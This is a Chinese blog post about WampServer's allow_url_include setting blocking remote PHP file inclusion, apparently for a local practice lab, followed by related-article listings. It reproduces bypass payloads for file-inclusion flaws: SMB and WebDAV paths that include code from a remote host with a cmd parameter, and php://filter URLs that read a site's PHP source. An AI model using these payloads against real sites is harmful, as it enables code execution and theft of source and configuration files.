wampserver无法使用文件包含http功能的问题

最新推荐文章于 2022-07-08 14:51:09 发布
最新推荐文章于 2022-07-08 14:51:09 发布
阅读量320 收藏
点赞数
分类专栏: 环境配置与搭建
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fiverya/article/details/104508637
版权

问题描述如下:

allow_url_include = 0禁用了http://包装器

有一些绕过的方法,但是试了一下没什么用处。链接如下:

php文件包含漏洞(allow_url_include=Off)的绕过方法

第1种:smb协议

Payload:http://127.0.0.1/aaa.php?path=\\43.5*.**.74\ica\abc1238.htm

第2种:WebDAV

Payload:http://127.0.0.1/aaa.php?path=\\36.*8.**.74\webdav\code.htm&cmd=phpinfo();

第3种:php://filter/

利用php://filter/不能直接GetShell,但可以读取网站php代码文件,然后进行代码分析。或读取网站配置文件等其他重要文件。

Payload:

http://127.0.0.1/aaa.php?path=php://filter/read=convert.base64-encode/resource=D:/phpStudy/WWW/index.php

http://192.168.56.130/aaa.php?path=php://filter/read=convert.base64-encode/resource=/var/www/html/index.php

 

还有人说是要修改php.ini中的设置:

修改过后发现没有什么作用。重启服务也无效。

最后解决方法为在这里进行设置:

耳语吖
关注
专栏目录
WampServer配置https服务器
流年master的博客
03-04 6134
说一说之前遇到的坑吧,之前使用的是wamp3.0.6版本,默认的http服务以及数据库等使用都没有问题,因为和小伙伴们要进行数据共享,所以没想着换版本搭建https服务,以至于看了很多wamp修改httpd.conf和httpd-ssl.conf配置https服务,均没有成功,期间还以为是证书出了问题,之后用腾讯云服务的正式证书测试也是fail 后来发现是wamp的版本问题使用wamp2.5配...
解决安装WampServer时提示缺少msvcr110.dll文件的问题
12-20
这个动态链接库(DLL)文件是Microsoft Visual C++ 2011(也称为VC++ 2012)的一部分,它包含了一些基本的C++运行时功能,用于支持运行使用该编译器创建的程序,包括WampServer中的某些组件。 当WampServer在安装...
phpmyadmin mysql getshell
Abc_Kimball的博客
12-07 168
phpmyadmin mysql getshell 在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录时,进而通过弱口令或者暴力破解进入数据库之后,有多种方法进行getshell 注:大多数集成包里自带,如:phpstudy,wampserver,xampp等 实验环境: Windows(攻机) Windows(靶机)phpstudy集成环境 查看日志路径,可以在变量里搜log查看 也可以用命令语句查看 show variables like '%general%'; into ou
WAMP下不同的php.ini配置文件加载问题
MYXuu的博客
06-15 1971
# 相关信息 wamp version 3.0.6 64bit 我的wamp安装路径 H:\WebDevelopmentEnvironment\wamp64\ Windows 10 # php.ini配置文件存储路径 如果你在wamp的安装目录下仔细查找过php的配置文件php.ini的话,你可以在PHP的安装目录与Apache的bin目录下找到它。 Apache的bin目录下 ...
DVWA-PHP function allow_url_include: Disabled
Java、C语言、嵌入式开发,计算机科学与技术专业
07-08 1581
更改php.ini中的参数为On
基于wampserver2.5的PHP上传读取数据 文件包
11-28
7. **教程与学习资源**:该压缩包提及后期会有教程更新,这表明可能包含或链接到一系列教学材料,帮助初学者了解如何使用WampServer2.5进行PHP开发,包括如何配置环境、创建数据库、处理文件上传和读取等操作。...
wampserver
12-13
5. **多语言支持**:WampServer支持多种语言,包括简体中文,方便国内开发者使用。 6. **兼容性**:WampServer兼容Windows系统下的大多数Web开发框架和CMS系统,如WordPress、Joomla、Drupal等。 7. **自定义设置*...
使用wampserver部署Vtigercrm8流程
最新发布
01-26
8. **后续优化**:为了提高性能和安全性,你可能需要进行一些额外的配置,比如调整WampServer的配置文件以优化内存使用,或者启用SSL以实现安全的HTTPS连接。 总之,通过WampServer部署Vtiger CRM 8是一个相对简单...
wampserver搭建HTTP服务(Apache)
carriehaohao的博客
01-04 3958
1. 安装WampServer 2. 管理HTTP服务 3. 配置根目录 4. 网站部署 5. 配置虚拟主机
php 查询指定目录下包含特定内容的文件
weixin_33725807的博客
04-24 522
2019独角兽企业重金招聘Python工程师标准>>> ...
关于TP5使用GuzzleHttp发送请求遇到的问题解决
weixin_39289083的博客
07-08 1万+
环境说明: php5.5 GuzzleHttp tp5 错误说明:$client = new \GuzzleHttp\Client(); $response = $client->post($url,[‘form_params’=>$data]); 但是接收方是接收不到我发送的方法,显示为空。原因因为tp5从model里拿出来的是对象。正常请求过程中,tp5会自动根据头部,或者配置等等自动转换成
Linux有问必答:Linux上Apache错误日志的位置在哪里?
weixin_34123613的博客
05-02 436
错误日志和访问日志文件为系统管理员提供了有用的信息,比如,为 Web 服务器排障,保护系统不受各种各样的恶意活动侵犯,或者只是进行各种各样的分析以监控 HTTP 服务器。根据你 Web 服务器配置的不同,其错误/访问日志可能放在你系统中不同位置。 本文可以帮助你找到Linux上的Apache错误日志。 Debian,Ubuntu或Linux Mint...
DVWA-PHP function allow_url_include: Disabled错误
热门推荐
安全菜鸟的学习之旅
07-17 3万+
参考网址:https://stackoverflow.com/questions/34274492/dvwa-setup-php-function-allow-url-include-disabled/34540293 在进行DVWA的配置时出现了PHP function allow_url_include: Disabled错误,错误如下。 系统给的错误提示是这样...
wampserver本地部署https服务器
liudaweii的博客
07-05 3346
原料:window系统、wampserver服务器、 1、首先第一步需要购买ssl证书,我是在阿里云申请的免费版用于测试。下载一个SSL压缩包,因为我们的服务器是用wampserver搭建的,所以只需要压缩包里的Apache文件夹下的三个文件就行。 2、在C:\wamp64\bin\apache\apache2.4.23\conf ,将上述三个文件放进去 3、修改\apache2.4....
WEB渗透模拟环境WebGoat、Wampserver、DVWA安装、使用及漏洞验证实操
艾欧尼亚归我了
01-20 1089
1.相关软件包下载地址 链接:https://pan.baidu.com/s/1aampB2z4Wz1PSjPBg5uUYw 提取码:axri 2.安装Webgoat 解压WebGoat-OWASP_Standard-5.2.zip,双击下面webgoat_8008.bat,出现Server startup in xxx ms表示启动完成 输入http://localhost:80...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值